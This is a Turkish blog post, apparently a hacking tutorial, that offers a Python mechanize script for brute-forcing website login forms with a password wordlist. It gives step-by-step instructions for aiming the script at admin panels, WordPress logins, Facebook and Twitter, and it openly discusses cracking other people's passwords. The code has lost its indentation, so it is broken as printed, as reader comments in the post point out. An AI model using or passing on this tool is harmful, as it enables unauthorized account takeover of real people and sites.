Python ile Hack (Mechanize)

Python ile site şifresi kırmak için (Site Admin,Face,Twit vb..) aşağıdaki kodları bir metin editörüne kopyalayıp web.py adıyla kaydedin.

import mechanize
br=mechanize.Browser()
br.set_handle_robots(False)
br.addheaders=[('User-agent', "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")]

dos=open("loginweb2.txt","w+")
dos.write(br.open("http://web.idelobi.com/login.php").read())
dos.seek(0)
text=dos.read()

site=raw_input("Web Site:")
postmail=raw_input("Post Mail:")
postpass=raw_input("Post Pass:")
postformid=raw_input("Post Form id:")
username=raw_input("User:")
txt=raw_input("Password Txt:")

br.open(site)
br.select_form(nr=int(postformid))
br[postmail]="xxxxxx@gmail.com"
br[postpass]="yyy1zzz2"
data=br.submit()
print "Error Post Url:"
print br.geturl()
print ""
html=data.read()

br.open(site)
br.select_form(nr=int(postformid))
br[postmail]="Yonetici"
br[postpass]="yyy1zzz2"
data2=br.submit()
print "Error Post Url:"
print br.geturl()
print ""
html2=data2.read()

with open(txt, "r") as f:
for password in f:
br.open(site)
br.select_form(nr=int(postformid))
br[postmail]=username
br[postpass]=(password.replace("\n",""))
data3=br.submit()
html3=data3.read()
if html3 != text and html3 != html and html3 != html2:
print ""
print br.geturl()
print username, password
break
dos.close()



Bunu kaydettikten sonra.

Terminal ekranını açın.

python web.py
komutunu girip entera bastıktan sonra size şifre denemesi yapacapınız sitenin şifre giriş ekranına ait olan linki isteyecektir.

Örnek: 
www.siteadi.com/admin/
www.siteadi.com/wp-admin.php
www.siteadi.com/login.php
www.facebook.com
www.twitter.com
gibi.

Site linkini girip entera bastıktan sonra.Sizden Post Mail ve Post Pass verilerini isteyecektir.Bu verileri siteye sağtıklayıp kaynağı görüntüle dediğinizde açılan html kodları arasında <form ile başlayan kısımda bulabilirsiniz. 
Örnek:
Bu örnekte Post Mail kısmı kullanici
Post Pass kısmı sifre olarak bulduk

ve verileri terminal ekranına girdik.
Şimdi bizden Post Form id: istedi. Buraya 0 değerini gireceğiz Buda şu anlama geliyor. 0 ıncı forma veri göndereceğiz. Yani o web sayfasında 2 adet form olsaydı ve biz ikinciye veri göndermek isteseydik gireceğimiz değer 1 olacaktı.Web sayfalarında duruma göre 2 veya 3 adet form olabilir. 
Formlardan biri Üyelik formu iken diğeri kullanıcı adı ve şifre isteyen giriş formudur.

Ve şimdi bizden Users: istedi yani kullanıcı adı. Eğerki bir kişinin şifresini bulmaya çalışıyorsak o kişinin zaten kullanıcı adını biliyor oluruz. 

Örneğin idelobi.com un facebook kullanıcı adı idelobi@gmail.com dur. Ama bir web sitesinin admin panelini kırmaya çalışıyorsak Örneğin wordpress sistemlerde Kullanıcı adı Admin dir. Bu kısmada verimizi girip entera bastıktan sonra bizden Password Txt: isteyecek. 

 Buda şifre ihtimallerinin olduğu txt dosyamızdır. Yani wordlistimiz. Denemek için kendi hesabınızı hacklemek istiyorsanız. sifreler0302.txt diye bir dosya açıp içerisine satır satır yanlış şifreler girdikten sonra son satıra doğru olan şifreyi girip kaydedin. 

Ve terminalimizdeki bizden Password Txt isteyen satıra bu dosyanın adını yazıp entera basın. sifreler.0302.txt

Ve program txt deki kayıtlı tüm şifreleri deneyecektir.Bulduğunda durup ekrana yazacaktır.

Başkası için tüm şifre ihtimallerinin(kombinasyonlarının) olduğu bir şifreyi kırmaya çalışıyosanız ve bu şifre kombinasyonu dosyasını oluşturmak için Crunch konumuzu okuyup şifreler wordlistinizi oluşturun.  

Örnek python kod yazımı.





Yorumlar

  1. Hata var print ler hata veriyor

    YanıtlaSil
  2. döngü ve şart işerisinde olan printleri veya değişkenkenleri tab tuşu ile hizalamanız gerekebilir.
    python da açılış ve kapanış olmadığı için!

    YanıtlaSil
  3. Bu yorum yazar tarafından silindi.

    YanıtlaSil
  4. örnek görüntüyü konuya ekledim.

    https://4.bp.blogspot.com/-4j75XNCo22g/WXcRrx0U-mI/AAAAAAAACJI/yq0fdClexYU0M4lRHglxoXS_bNrmmcLyACLcBGAs/s640/ornek.png

    YanıtlaSil

Yorum Gönder

Bu blogdaki popüler yayınlar

Wifi Hack (Wpa/Wpa2) Şifre Kırmak

Crunch Kullanımı (Kali Linux Şifre Kırma)